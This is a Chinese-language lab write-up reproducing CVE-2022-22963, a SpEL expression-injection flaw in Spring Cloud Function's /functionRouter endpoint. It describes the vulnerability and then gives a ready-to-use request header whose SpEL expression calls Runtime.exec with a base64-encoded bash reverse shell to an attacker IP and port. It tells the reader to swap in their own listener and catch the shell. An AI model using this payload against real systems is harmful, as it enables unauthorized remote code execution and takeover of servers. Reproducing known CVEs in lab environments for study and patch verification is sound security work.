Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现

名称: Spring Cloud Function SPEL 远程代码执行

描述: Spring Cloud Function 是基于Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。 由于Spring Cloud Function中RoutingFunction类的apply方法将请求头中的“spring.cloud.function.routing-expression”参数作为Spel表达式进行处理,造成了Spel表达式注入漏洞,未经授权的远程攻击者可利用该漏洞执行任意代码。

靶场打开以后,访问这个地址,抓取这个地址的数据包

/functionRouter

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现_第1张图片

把数据包的请求模式改成POST,注意:POST不能直接切换要右键通过选项来切换

在请求头中添加如下字段,其中这段base64的值是反弹shell的命令,要自己替换成自己的。

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjkxLjEzOC85MDA0IDA+JjE=}|{base64,-d}|{bash,-i}")

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现_第2张图片

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现_第3张图片

攻击机上监听指定端口 :

image

点击发送数据包后,即可在这边接收到来自目标的shell

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现_第4张图片

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现_第5张图片

你可能感兴趣的:(网络安全,web安全,web安全,网络安全)